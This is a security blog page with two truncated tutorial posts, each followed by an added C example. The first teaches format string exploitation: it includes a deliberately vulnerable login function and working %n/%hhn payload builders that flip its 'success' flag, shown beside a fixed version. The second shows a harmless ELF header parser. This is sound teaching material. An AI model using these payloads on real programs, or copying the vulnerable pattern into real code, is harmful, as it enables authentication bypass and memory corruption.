
Posts

Showing posts from February, 2019

Format String Vulnerability 2 - Writing data in memory

Hi everyone. Today I will discuss exploiting format strings. If you did not read the first part, you can read it here: http://oxhat.blogspot.com/2017/12/exploiting-format-string-vulnerability.html

In this post I will show how a format string vulnerability can be used to write data into memory. Note that ASLR was disabled system-wide during this work.

The target is a program written by a fictitious admin. The code is self-explanatory, but here is a short overview: the admin has removed the password check, so the variable called "success" that controls login is never touched by it. That means the value of the success variable is always 0, and the admin is confident that this will stop unauthorized access to the application. Let us prove him wrong by exploiting it.

What will our attack be? We will overwrite the success variable with some arbitrary value so that the check passes, as it will becom
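The write primitive behind that attack, as an added example that is not code from the original post: a `%n` conversion stores the number of characters printed so far, and the field width of a preceding conversion sets that number, so the attacker chooses the value that lands in `success`. To keep the example deterministic, the address of the flag is handed to the vulnerable call as an explicit argument and reached with `%2$n`, where the real exploit plants the address in the input buffer and finds its stack offset; the functions `login_vulnerable`, `login_fixed`, `build_payload` and `forge_dword` are names chosen for this example. It assumes glibc on a little-endian x86 system, as in the post, and switches off glibc's fortified printf, which otherwise aborts on a `%n` that sits in a writable buffer.

```c
/* Added example, not the post's code: the %n write primitive used to flip
 * `success`, beside the fixed call. Assumes glibc, little-endian x86. */
#undef _FORTIFY_SOURCE        /* fortified glibc printf aborts on %n in a writable
                                 buffer; the post's target runs without that check */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The login flag the fictitious admin assumes can never leave 0. */
int success = 0;

/* Vulnerable pattern: untrusted input is used as the format string.
 * Arguments 1 and 2 stand in for what the real exploit finds on the stack:
 * something for a %u to pad with, and the address of the flag. */
int login_vulnerable(const char *input, int *flag)
{
    char scratch[8192];
    snprintf(scratch, sizeof scratch, input, 0u, flag);   /* BUG: input is the format */
    return *flag != 0;
}

/* Fixed pattern: the input is printed as data, so a %n inside it does nothing. */
int login_fixed(const char *input, int *flag)
{
    char scratch[8192];
    snprintf(scratch, sizeof scratch, "%s", input);
    return *flag != 0;
}

/* "%1$<value>u%2$n": argument 1 is padded to exactly `value` characters, so the
 * %n that follows stores `value` through argument 2. value must be >= 1. */
void build_payload(char *out, size_t outsz, unsigned value)
{
    snprintf(out, outsz, "%%1$%uu%%2$n", value);
}

/* Run the attack against a fresh flag and return what the flag holds afterwards. */
int demo_flip(unsigned value)
{
    char payload[64];
    int flag = 0;
    build_payload(payload, sizeof payload, value);
    login_vulnerable(payload, &flag);
    return flag;
}

/* The same payload through the fixed function: the flag stays 0. */
int demo_fixed(unsigned value)
{
    char payload[64];
    int flag = 0;
    build_payload(payload, sizeof payload, value);
    login_fixed(payload, &flag);
    return flag;
}

/* Byte-wise write for values too large to pad to in one go: four %hhn writes,
 * each after enough padding that the low byte of the running count equals the
 * next byte of `value` (little-endian order). The count never decreases, so each
 * step adds (byte - count) mod 256, or 256 when that is 0, because a %u prints
 * at least one character. */
uint32_t forge_dword(uint32_t value)
{
    uint32_t target = 0;
    signed char *b = (signed char *)&target;       /* %hhn expects signed char * */
    char fmt[128] = "";
    char scratch[8192];
    unsigned count = 0;
    for (int i = 0; i < 4; i++) {
        unsigned want = (value >> (8 * i)) & 0xff;
        unsigned incr = (want - count) & 0xff;
        if (incr == 0) incr = 256;
        count += incr;
        size_t len = strlen(fmt);
        snprintf(fmt + len, sizeof fmt - len, "%%1$%uu%%%u$hhn", incr, (unsigned)(i + 2));
    }
    snprintf(scratch, sizeof scratch, fmt, 0u, b, b + 1, b + 2, b + 3);
    return target;
}

int main(void)
{
    char payload[64];
    build_payload(payload, sizeof payload, 0x41);
    printf("payload: %s\n", payload);
    printf("login through vulnerable code: %d, success = 0x%x\n",
           login_vulnerable(payload, &success), success);
    success = 0;
    printf("login through fixed code: %d, success = 0x%x\n",
           login_fixed(payload, &success), success);
    printf("forged dword: 0x%08x\n", forge_dword(0xdeadbeef));
    return 0;
}
```

Two things worth checking on a real target before spending time on offsets: whether the binary was built with `-D_FORTIFY_SOURCE` (the `%n` abort above), and whether the format string reaches a `*printf` call with no further arguments, which is exactly what `gcc -Wformat-security` flags at build time.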

ELF Binary Internals 1 : ELF Basics

In this post I will share the basics of ELF binaries. Let us begin with a very simple hello world program in C:

#include <stdio.h>

int main(void) {
    printf("\nHello World\n");
    return 0;
}

Since I am on a 64-bit Linux system, I will compile the binary in both 32-bit and 64-bit mode with gcc:

for 64-bit -> gcc hello.c -o hello64
for 32-bit -> gcc hello.c -m32 -o hello32

(If the 32-bit build fails, install gcc multilib with: sudo apt-get install gcc-multilib)

Running the file command on the binaries we created gives the following output:

pentest@ubuntu:~/Desktop$ file hello64
hello64: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=797fa6ea8a92b773eb5106c822a76788441ceac1, not stripped
pentest@ubuntu:~/Desktop$ file hello32
hello32: ELF 32-bit LSB shared
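Everything `file` prints before "dynamically linked" comes from the first 64 (or 52) bytes of the binary: the `\x7fELF` magic, the class byte (32- or 64-bit), the data byte (LSB or MSB), and the `e_type`, `e_machine`, `e_version` and `e_entry` fields that follow. The post's hello64 shows up as a "shared object" rather than an "executable" because gcc on current Ubuntu builds a position-independent executable by default, which sets `e_type` to ET_DYN; building with `-no-pie` gives ET_EXEC and `file` then says "executable". As an added example, not code from the original post, here is a small parser for those fields run over two constructed headers shaped like hello64 and hello32. The constants are the standard ELF values, defined inline so the example does not need `<elf.h>`; the entry addresses in the sample headers are made up, and the names `parse_elf_header` and `describe_elf` are chosen for this example.

```c
/* Added example, not the post's code: parse the ELF identification and header
 * fields that `file` summarises. Sample headers below are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { EI_CLASS = 4, EI_DATA = 5, EI_VERSION = 6, EI_NIDENT = 16 };
enum { ELFCLASS32 = 1, ELFCLASS64 = 2 };
enum { ELFDATA2LSB = 1, ELFDATA2MSB = 2 };
enum { ET_REL = 1, ET_EXEC = 2, ET_DYN = 3, ET_CORE = 4 };
enum { EM_386 = 3, EM_X86_64 = 62 };

struct elf_info {
    int cls, data;            /* ELFCLASS32/64, ELFDATA2LSB/MSB */
    uint16_t type, machine;
    uint32_t version;
    uint64_t entry;
};

/* Read an n-byte little- or big-endian integer. */
static uint64_t rd(const uint8_t *p, int n, int lsb)
{
    uint64_t v = 0;
    for (int i = 0; i < n; i++)
        v |= (uint64_t)p[lsb ? i : n - 1 - i] << (8 * i);
    return v;
}

/* Returns 0 and fills *out, or -1 if buf is not a well-formed ELF header. */
int parse_elf_header(const uint8_t *buf, size_t len, struct elf_info *out)
{
    if (len < EI_NIDENT || memcmp(buf, "\x7f" "ELF", 4) != 0) return -1;
    int cls = buf[EI_CLASS], data = buf[EI_DATA];
    if ((cls != ELFCLASS32 && cls != ELFCLASS64) ||
        (data != ELFDATA2LSB && data != ELFDATA2MSB) || buf[EI_VERSION] != 1)
        return -1;
    size_t hdr = cls == ELFCLASS64 ? 64 : 52;   /* sizeof Elf64_Ehdr / Elf32_Ehdr */
    if (len < hdr) return -1;                    /* truncated header */
    int lsb = data == ELFDATA2LSB;
    out->cls = cls;
    out->data = data;
    out->type = (uint16_t)rd(buf + 16, 2, lsb);
    out->machine = (uint16_t)rd(buf + 18, 2, lsb);
    out->version = (uint32_t)rd(buf + 20, 4, lsb);
    /* e_entry is 4 bytes in a 32-bit header and 8 bytes in a 64-bit one */
    out->entry = cls == ELFCLASS64 ? rd(buf + 24, 8, lsb) : rd(buf + 24, 4, lsb);
    return 0;
}

static const char *type_name(uint16_t t)
{
    switch (t) {
    case ET_REL:  return "relocatable";
    case ET_EXEC: return "executable";
    case ET_DYN:  return "shared object";   /* also what a PIE reports as */
    case ET_CORE: return "core file";
    default:      return "unknown type";
    }
}

static const char *machine_name(uint16_t m)
{
    switch (m) {
    case EM_386:    return "Intel 80386";
    case EM_X86_64: return "x86-64";
    default:        return "unknown machine";
    }
}

/* One-line summary in the style of `file`; NULL if buf is not valid ELF.
 * Uses a static buffer, so each call overwrites the previous result. */
const char *describe_elf(const uint8_t *buf, size_t len)
{
    static char line[128];
    struct elf_info i;
    if (parse_elf_header(buf, len, &i) != 0) return NULL;
    snprintf(line, sizeof line, "ELF %d-bit %s %s, %s, version %u, entry 0x%llx",
             i.cls == ELFCLASS64 ? 64 : 32, i.data == ELFDATA2LSB ? "LSB" : "MSB",
             type_name(i.type), machine_name(i.machine), i.version,
             (unsigned long long)i.entry);
    return line;
}

/* Constructed header shaped like the post's hello64: a PIE, so e_type is ET_DYN. */
const uint8_t sample_hello64[64] = {
    0x7f, 'E', 'L', 'F', ELFCLASS64, ELFDATA2LSB, 1, 0,  0, 0, 0, 0, 0, 0, 0, 0,
    ET_DYN, 0,                        /* e_type */
    EM_X86_64, 0,                     /* e_machine */
    1, 0, 0, 0,                       /* e_version */
    0x40, 0x10, 0, 0, 0, 0, 0, 0,     /* e_entry = 0x1040 (made up) */
    /* remaining header fields left zero */
};

/* Constructed header shaped like the post's hello32, also a PIE (ET_DYN). */
const uint8_t sample_hello32[52] = {
    0x7f, 'E', 'L', 'F', ELFCLASS32, ELFDATA2LSB, 1, 0,  0, 0, 0, 0, 0, 0, 0, 0,
    ET_DYN, 0, EM_386, 0, 1, 0, 0, 0,
    0x00, 0x90, 0x04, 0x08,           /* e_entry = 0x08049000 (made up) */
};

int main(void)
{
    printf("hello64: %s\n", describe_elf(sample_hello64, sizeof sample_hello64));
    printf("hello32: %s\n", describe_elf(sample_hello32, sizeof sample_hello32));
    return 0;
}
```

The same fields can be read from a real binary with `readelf -h hello64`; comparing `Type:` there against the `file` output is the quickest way to see the PIE/ET_DYN relationship on your own build.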